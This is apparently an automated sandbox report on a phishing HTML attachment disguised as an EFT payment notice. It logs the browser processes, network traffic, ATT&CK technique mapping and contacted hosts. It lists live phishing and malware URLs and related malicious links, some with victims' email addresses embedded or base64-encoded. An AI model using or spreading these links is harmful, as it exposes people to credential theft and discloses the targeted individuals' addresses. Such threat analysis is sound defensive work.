    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443

    System Summary

    barindex
    Source: Name includes: EFT_Payment_Notification_Warriorsheart.htmlInitial sample: payment
    Source: classification engineClassification label: mal96.phis.evad.winHTML@28/29@28/11
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\EFT_Payment_Notification_Warriorsheart.html"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1820,i,6564301633769382234,10508467328099275004,262144 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1820,i,6564301633769382234,10508467328099275004,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

    Data Obfuscation

    barindex
    Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29tHTTP Parser: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29t
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29tHTTP Parser: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29t
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29t0%Avira URL Cloudsafe
    https://rfll.yordickyel.ru/16E/100%Avira URL Cloudphishing
    https://s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru/tpsifzxrcjpnmiqlcapcxqSIHzEofYKCVZVKRCCQIPXIQHQALLZRCDVNUAXO100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    rfll.yordickyel.ru
    172.67.198.166
    truetrue
      unknown
      code.jquery.com
      151.101.130.137
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.25.14
        truefalse
          high
          s-part-0036.t-0009.t-msedge.net
          13.107.246.64
          truefalse
            high
            challenges.cloudflare.com
            104.18.94.41
            truefalse
              high
              s-part-0017.t-0009.t-msedge.net
              13.107.246.45
              truefalse
                high
                www.google.com
                142.250.185.228
                truefalse
                  high
                  s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru
                  188.114.96.3
                  truefalse
                    unknown
                    www.office.com
                    unknown
                    unknownfalse
                      high
                      identity.nel.measure.office.net
                      unknown
                      unknownfalse
                        high
                        login.microsoftonline.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.jsfalse
                            high
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                              high
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1491089504:1736795691:_2M0zyAcgPOuW97IkhXnYsXlr57SU1M4wgTcK-1QGCY/9017f0c19bf64357/60hVcdymwMdF.kHrUj8sh4qMzB_LYBdwV7QA5YSJEa4-1736798090-1.1.1.1-toacKPVl_FCZPddV4C0wsyR6bPaSl0bKqxISI91DDVq0YUt2ql4_H2fb7727RIYsfalse
                                high
                                https://rfll.yordickyel.ru/16E/true
                                • Avira URL Cloud: phishing
                                unknown
                                https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/9017f0c19bf64357/1736798092090/f65b749e6380f3d0be864737123b3cacba5c88d365ed8513907c381f725621c4/7je5Kn2j8A5PYz6false
                                    high
                                    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                      high
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ttfv6/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/false
                                        high
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9017f0c19bf64357&lang=autofalse
                                          high
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/9017f0c19bf64357/1736798092091/WvlYSSUVjyD9zH9false
                                            high
                                            file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29ttrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru/tpsifzxrcjpnmiqlcapcxqSIHzEofYKCVZVKRCCQIPXIQHQALLZRCDVNUAXOfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            104.17.24.14
                                            unknownUnited States
                                            13335CLOUDFLARENETUSfalse
                                            142.250.185.228
                                            www.google.comUnited States
                                            15169GOOGLEUSfalse
                                            172.67.198.166
                                            rfll.yordickyel.ruUnited States
                                            13335CLOUDFLARENETUStrue
                                            104.18.94.41
                                            challenges.cloudflare.comUnited States
                                            13335CLOUDFLARENETUSfalse
                                            151.101.130.137
                                            code.jquery.comUnited States
                                            54113FASTLYUSfalse
                                            239.255.255.250
                                            unknownReserved
                                            unknownunknownfalse
                                            188.114.97.3
                                            unknownEuropean Union
                                            13335CLOUDFLARENETUSfalse
                                            188.114.96.3
                                            s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ruEuropean Union
                                            13335CLOUDFLARENETUSfalse
                                            151.101.66.137
                                            unknownUnited States
                                            54113FASTLYUSfalse
                                            104.17.25.14
                                            cdnjs.cloudflare.comUnited States
                                            13335CLOUDFLARENETUSfalse
                                            IP
                                            192.168.2.5
                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1590262
                                            Start date and time:2025-01-13 20:53:53 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 5m 27s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:defaultwindowshtmlcookbook.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:6
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:EFT_Payment_Notification_Warriorsheart.html
                                            Detection:MAL
                                            Classification:mal96.phis.evad.winHTML@28/29@28/11
                                            EGA Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Found application associated with file extension: .html
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 142.250.186.142, 66.102.1.84, 142.251.40.227, 142.250.186.174, 216.58.206.78, 216.58.206.42, 172.217.16.138, 142.250.186.138, 172.217.16.202, 142.250.186.74, 142.250.185.170, 142.250.186.106, 142.250.184.202, 142.250.185.202, 142.250.185.234, 142.250.186.42, 142.250.185.106, 172.217.18.10, 142.250.184.234, 142.250.186.170, 142.250.181.234, 88.221.110.91, 192.229.221.95, 142.250.74.206, 142.250.186.110, 172.217.16.206, 20.190.159.4, 20.190.159.75, 20.190.159.23, 20.190.159.64, 40.126.31.67, 20.190.159.68, 20.190.159.73, 20.190.159.71, 13.107.6.156, 2.16.168.113, 2.16.168.124, 142.250.185.238, 216.58.206.46, 142.250.185.131, 142.250.186.46, 172.217.18.14, 2.19.126.143, 2.19.126.146, 2.23.242.162, 4.175.87.197, 13.107.246.45, 13.107.246.64
                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, ak.privatelink.msidentity.com, a1894.dscb.akamai.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, update.googleapis.com, login.mso.msidentity.com, optimizationguide-pa.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, www.tm.ak.prd.aadg.akadns.net, b-0004.b-msedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            No simulations
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            104.17.24.14Proforma.Invoice.Payment.$$.htmlGet hashmaliciousUnknownBrowse
                                            • cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
                                            http://vtaurl.comGet hashmaliciousUnknownBrowse
                                            • cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
                                            http://Voyages.CNTraveler.comGet hashmaliciousUnknownBrowse
                                            • cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
                                            104.18.94.41https://timecusa-my.sharepoint.com/:f:/p/stephensw/Erq5TMDIJBVBvh6vbWmpurEB4UwHKTW8nzSkPE2Ckmvugg?e=SepTcTGet hashmaliciousHTMLPhisherBrowse
                                              https://docusign.legalcloudfiles.com/S06ga?e=kelly.wright@sanctuary-housing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                Cardfactory Executed Agreement DocsID- Sign & Review..emlGet hashmaliciousHTMLPhisherBrowse
                                                  https://connexion-pro.support/adobe/s/assets/Get hashmaliciousUnknownBrowse
                                                    https://encryption-deme-group.lomiraxen.ru/PdoodjcL/#Mvercauteren.william@deme-group.comGet hashmaliciousUnknownBrowse
                                                      https://logintime.webflow.io/Get hashmaliciousUnknownBrowse
                                                        http://us-suite-trezzor-cdn.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                          https://url.us.m.mimecastprotect.com/s/si15COYvJJSRLD3svhDSGbOPs?domain=ejfv5thbb.cc.rs6.netGet hashmaliciousUnknownBrowse
                                                            https://url.us.m.mimecastprotect.com/s/si15COYvJJSRLD3svhDSGbOPs?domain=ejfv5thbb.cc.rs6.netGet hashmaliciousUnknownBrowse
                                                              https://freesourcecodes70738.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuW-242imNXGet hashmaliciousUnknownBrowse
                                                                151.101.130.137http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                • code.jquery.com/jquery-1.11.3.min.js
                                                                http://imaps-support.us/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                • code.jquery.com/jquery-1.11.3.min.js
                                                                http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                • code.jquery.com/jquery-1.7.min.js
                                                                https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29tGet hashmaliciousUnknownBrowse
                                                                • code.jquery.com/jquery-3.3.1.min.js
                                                                http://site9613885.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                • code.jquery.com/jquery-1.7.2.min.js
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                s-part-0036.t-0009.t-msedge.nethttps://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956237c699124bb06f6840075804affff79070f72fbd27ec4885c3a2ba06657b8a52338eb80052baee9f74c4e2e0e7f85c073df939f1ac4dff75f76c95d46ac2361c7b14335e4f12c5c5d49c49b1d2f4c838a&action_type=SIGNGet hashmaliciousUnknownBrowse
                                                                • 13.107.246.64
                                                                ReIayMSG__polarisrx.com_#7107380109.htmGet hashmaliciousHTMLPhisherBrowse
                                                                • 13.107.246.64
                                                                https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comGet hashmaliciousUnknownBrowse
                                                                • 13.107.246.64
                                                                Quarantined Messages(3).zipGet hashmaliciousHTMLPhisherBrowse
                                                                • 13.107.246.64
                                                                AllItems.htmGet hashmaliciousHTMLPhisherBrowse
                                                                • 13.107.246.64
                                                                https://hffa.studycentrecpfc.com/D9ns6.studycentrecpfc.com/bUhZb/Get hashmaliciousHTMLPhisherBrowse
                                                                • 13.107.246.64
                                                                https://t.ly/ShNFUGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                • 13.107.246.64
                                                                https://viewstripo.email/680864d7-5609-4e6a-8914-c4d257d4c5ee1731949744848Get hashmaliciousUnknownBrowse
                                                                • 13.107.246.64
                                                                Play_vm_Message_for_Melissa.medina_wav_ .htmGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                • 13.107.246.64
                                                                https://url11.kmt4ispayroll.com/?id=eyJlbWFpbF9pZCI6ImRnVER4d2NEQVAyTURfeU1Ed0dUSlVtb194VC0xeUp6Wk-t3aldrdz0iLCJocmVmIjoiaHR0cHM6Ly90Lm1lL3N0YWN5X215YnJvY2FyZCIs-ImludGVybmFsIjoiYzNjNzA3MDhmYzM5ZmQ4YzBmIiwibGlua19pZCI6ODY4fQ-e06f9243688f8d3f6986ffbedf3a11c620bbea820e86e17c3fd3a4979cbc3e26AOMMRkVTE4y4i4MhR8PO5Li1enwscIrfMMFkF0FdObryKs8IHKZe9lNXxCYBGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                • 13.107.246.64
                                                                cdnjs.cloudflare.comhttps://docusign.legalcloudfiles.com/S06ga?e=clopez@autopistacentral.clGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
                                                                • 104.17.25.14
                                                                https://cortevaopscenter.freshdesk.com/register/FFFaTYjVZRX8bcRDPna0Get hashmaliciousUnknownBrowse
                                                                • 104.17.24.14
                                                                Scan.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                https://docusign.legalcloudfiles.com/S06ga?e=kelly.wright@sanctuary-housing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                https://deltacapoffers.com/prequalification.php?utm_source=klayvio&utm_medium=email&utm_campaign=scrapeddripcampaign&utm_id=efi&utm_term=efi&utm_content=scrapedlists6&_kx=YFJgSt5YAM6jpJldJ4ZDop7CB1jVRJhqJKw59Uk4HMU.QZibAuGet hashmaliciousUnknownBrowse
                                                                • 104.17.24.14
                                                                http://organismekina8at-my.sharepoint.com/:f:/g/personal/mariejoelle_tremblay_kina8at_ca/ErWnJRn_SWBKkEcx4yGorhMBtA4m6tEq5cYuHnwwp_z1SwGet hashmaliciousUnknownBrowse
                                                                • 104.17.25.14
                                                                Cardfactory Executed Agreement DocsID- Sign & Review..emlGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.24.14
                                                                DOCS974i7C63.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.24.14
                                                                DOCS974i7C63.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                challenges.cloudflare.comhttps://timecusa-my.sharepoint.com/:f:/p/stephensw/Erq5TMDIJBVBvh6vbWmpurEB4UwHKTW8nzSkPE2Ckmvugg?e=SepTcTGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.18.94.41
                                                                https://docusign.legalcloudfiles.com/S06ga?e=clopez@autopistacentral.clGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.18.95.41
                                                                https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
                                                                • 104.18.95.41
                                                                https://app.salesforceiq.com/r?target=631f420eed13ca3bcf77c324&t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&url=http://jet-electric-2014-ltd.jimdosite.com&d=DwMGaQGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.18.95.41
                                                                https://mega.foGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.18.95.41
                                                                https://docusign.legalcloudfiles.com/S06ga?e=kelly.wright@sanctuary-housing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.18.94.41
                                                                http://organismekina8at-my.sharepoint.com/:f:/g/personal/mariejoelle_tremblay_kina8at_ca/ErWnJRn_SWBKkEcx4yGorhMBtA4m6tEq5cYuHnwwp_z1SwGet hashmaliciousUnknownBrowse
                                                                • 104.18.95.41
                                                                Cardfactory Executed Agreement DocsID- Sign & Review..emlGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.18.94.41
                                                                https://emailcaptain.pages.dev/dimitar?login=eXVsdXlldl9hbkByZnMucnU=&page=_adobeGet hashmaliciousUnknownBrowse
                                                                • 104.18.95.41
                                                                https://encryption-deme-group.lomiraxen.ru/PdoodjcL/#Mvercauteren.william@deme-group.comGet hashmaliciousUnknownBrowse
                                                                • 104.18.94.41
                                                                code.jquery.comhttps://docusign.legalcloudfiles.com/S06ga?e=clopez@autopistacentral.clGet hashmaliciousHTMLPhisherBrowse
                                                                • 151.101.2.137
                                                                https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
                                                                • 151.101.194.137
                                                                phish_alert_sp2_2.0.0.0 (2).emlGet hashmaliciousUnknownBrowse
                                                                • 151.101.66.137
                                                                https://lgs.gngt.ru/d1MHvwa7NXCAlKk/Get hashmaliciousHTMLPhisherBrowse
                                                                • 151.101.2.137
                                                                Scan.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 151.101.194.137
                                                                https://docusign.legalcloudfiles.com/S06ga?e=kelly.wright@sanctuary-housing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                • 151.101.194.137
                                                                https://37ja0w4ofs2v93pb78wrnw.blob.core.windows.net/37ja0w4ofs2v93pb78wrnw/HT00.html#qs=r-afidgaidkggiiejaghghkciacjbeegjkagehdfagehdfababagbaecdaccaibkaddiiaejihifadccGet hashmaliciousPhisherBrowse
                                                                • 151.101.194.137
